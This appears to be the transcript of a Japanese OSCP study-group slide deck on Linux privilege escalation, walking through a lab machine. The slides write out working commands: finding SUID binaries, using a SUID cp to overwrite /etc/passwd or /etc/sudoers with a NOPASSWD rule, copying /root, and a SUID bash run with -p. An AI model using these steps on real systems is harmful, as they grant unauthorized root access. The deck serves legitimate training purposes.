Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Linuxでの権限昇格 / Privilege Escalation in Linux

Avatar for tkito tkito
March 24, 2023
Technology
0
830

Linuxでの権限昇格 / Privilege Escalation in Linux

2023/03/24に開催されたOSCP勉強会のLT資料(軽量版)です。
https://off-sec-lab.connpass.com/event/276425/

Avatar for tkito

tkito

March 24, 2023
Tweet

More Decks by tkito

See All by tkito
あの頃(2000年頃)のインターネット / The Internet in the early 2000s
Avatar for tkito tkito
1
120
Boot2Rootをやろう / Let's play Boot2Root
Avatar for tkito tkito
0
900
Re: SQLiから始めるRCE生活 / RCE via SQLi
Avatar for tkito tkito
0
290
権限昇格がんばるぞい LinPEAS編 / Privilege escalation using LinPEAS
Avatar for tkito tkito
1
3k
SOC-IRとOSCP / SOC-IR and OSCP
Avatar for tkito tkito
0
120

Other Decks in Technology

See All in Technology
Devinを使ったモバイルアプリ開発 / Mobile app development with Devin
Avatar for Yuki Anzai yanzm
0
100
AI時代の大規模データ活用とセキュリティ戦略
Avatar for Kengo Suzuki ken5scal
1
280
会社にデータエンジニアがいることでできるようになること
Avatar for 10xinc 10xinc
9
1.4k
我々は雰囲気で仕事をしている / How can we do vibe coding as well
Avatar for Naomi Yamasaki naospon
2
180
AIエージェントの開発に必須な「コンテキスト・エンジニアリング」とは何か──プロンプト・エンジニアリングとの違いを手がかりに考える
Avatar for Masaya Mori (森正弥) masayamoriofficial
0
150
Rethinking Incident Response: Context-Aware AI in Practice - Incident Buddy Edition -
Avatar for rrreeeyyy rrreeeyyy
0
130
React Server ComponentsでAPI不要の開発体験
Avatar for polidog polidog
PRO
1
360
LLMエージェント時代に適応した開発フロー
Avatar for Yuya Hirayama hiragram
1
270
Delegate authentication and a lot more to Keycloak with OpenID Connect
Avatar for Alexander Schwartz ahus1
0
240
Engineering Failure-Resilient Systems
Avatar for Mark Irozuru infraplumber0
0
130
ECS モニタリング手法大整理
Avatar for Yu Endo yendoooo
1
110
Exadata Database Service on Dedicated Infrastructure セキュリティ、ネットワーク、および管理について
Avatar for oracle4engineer oracle4engineer
PRO
1
350

Featured

See All Featured
Thoughts on Productivity
Avatar for Jon Yablonski jonyablonski
69
4.8k
Navigating Team Friction
Avatar for Lara Hogan lara
188
15k
Rebuilding a faster, lazier Slack
Avatar for samanthasiow samanthasiow
83
9.1k
How to Create Impact in a Changing Tech Landscape [PerfNow 2023]
Avatar for Tammy Everts tammyeverts
53
2.9k
YesSQL, Process and Tooling at Scale
Avatar for Rocio Delgado rocio
173
14k
It's Worth the Effort
Avatar for 3n 3n
187
28k
Scaling GitHub
Avatar for Zach Holman holman
462
140k
The Cost Of JavaScript in 2023
Avatar for Addy Osmani addyosmani
53
8.8k
No one is an island. Learnings from fostering a developers community.
Avatar for Antonio thoeni
21
3.4k
Connecting the Dots Between Site Speed, User Experience & Your Business [WebExpo 2025]
Avatar for Tammy Everts tammyeverts
8
470
Visualizing Your Data: Incorporating Mongo into Loggly Infrastructure
Avatar for mongodb mongodb
48
9.6k
StorybookのUI Testing Handbookを読んだ
Avatar for Shingo Yamazaki zakiyama
30
6k

Transcript

  1. Linuxでの権限昇格 2023/03/24 OSCP勉強会 きとう

  2. 自己紹介 なまえ • きとう、てきとう、tkito • Twitter: @tkito しゅみ • ゲームしたり海に潜ったり徳を積んだり

    2 おしごと • 企業でSOCの中の人とかIRとか Linuxでの権限昇格

  3. おことわり Linuxでの権限昇格 3 OSCP(PEN-200)勉強中の者が学んだ内容を 発表するものです どうかマサカリはおしまいください でも間違いがあったら教えてください

  4. 権限昇格 非特権ユーザーから特権ユーザーになること • 非特権ユーザー • 一般ユーザーのこと • 特権ユーザー • 一般ユーザーができないことをできる高い権限を持ったユーザー

    • Linuxだとroot • WindowsだとAdministratorとかSYSTEM • 今回はLinuxでのお話 Linuxでの権限昇格 4

  5. offsec-1-overtureにおける権限昇格 root権限のユーザを追加 Linuxでの権限昇格 5 /bin/cpに SUIDビット SUIDの立った プログラムの探索 /bin/cpで /etc/passwdを上書き

    root権限を持った ユーザを追加した passwdを用意 追加した ユーザでログイン 昇格!

  6. offsec-1-overtureにおける権限昇格 むずかしくない…? Linuxでの権限昇格 6 /bin/cpに SUIDビット SUIDの立った プログラムの探索 /bin/cpで /etc/passwdを上書き

    root権限を持った ユーザを追加した passwdを用意 追加した ユーザでログイン 昇格! • ここすごい閃きだと思う • /bin/cpじゃなくて別のだったら? パターン整理していくと何か知見が 得られるかも!?

  7. 権限昇格に使われる手法の整理 権限昇格までの手順をパーツに分けてパターンを整理してみる(WIP) Linuxでの権限昇格 7 ここに至るパスを 考えていけばいい

  8. Linuxでの権限昇格 8 ①/bin/cpにSUID ②ファイル書込可 ③/etc/passwdに追加 ④ログイン ⑤昇格完了

  9. offsec-1-overture 別解 攻略の流れ • find / -type f -perm –u=s

    2>/dev/null SUIDビットの立ったプログラムを探索 /bin/cpを確認 • cp /etc/sudoers /tmp/ /etc/sudoersをコピー • cat /tmp/sudoers > /tmp/sudoers2 編集のために自分をownerに • echo “apache ALL=NOPASSWD:ALL” >> /tmp/sudoers2 Pass無しでsudoできる魔法の言葉 • cp /tmp/sudoers2 /etc/sudoers /etc/sudoersに書き戻し • sudo su – sudoでrootに • cat /root/flag.txt フラグゲット Linuxでの権限昇格 9

  10. Linuxでの権限昇格 10

  11. offsec-1-overture 別解(邪道) 攻略の流れ • find / -type f -perm –u=s

    2>/dev/null SUIDビットの立ったプログラムを探索 /bin/cpを確認 • cp -rv /root /tmp/ /rootをごっそりコピー • cat /tmp/root/flag.txt フラグゲット • CTFならいいけどOSCPではダメ Linuxでの権限昇格 11

  12. おまけ SUIDを使って直接root権限を得る方法(overtureの攻略には使えない) • [*rootで*] • cp /bin/bash /tmp/bash bashをコピーして •

    chmod u+s /tmp/bash SUIDを立てる • [*non-rootで*] • /tmp/bash -p euid(effective uid)が0になりrootと同じ権限を得る • でもrootでコマンド実行させられる状況ならreverse shell使った方がいい気が… Linuxでの権限昇格 12

  13. まとめ • 権限昇格へのパスを一発で思いつける人すごいな! • Linuxでの権限昇格までの手順をパーツに分けて整理してみた(WIP) • 取り掛かりポイントが見つかったら権限昇格に向かって辿っていくとパスが出る • overtureの別解紹介 •

    パターン拡充していこう • Windowsでもやってみようか • みなさんのやり方とか工夫とか教えてください Linuxでの権限昇格 13

  14. おしまい きとう @tkito 14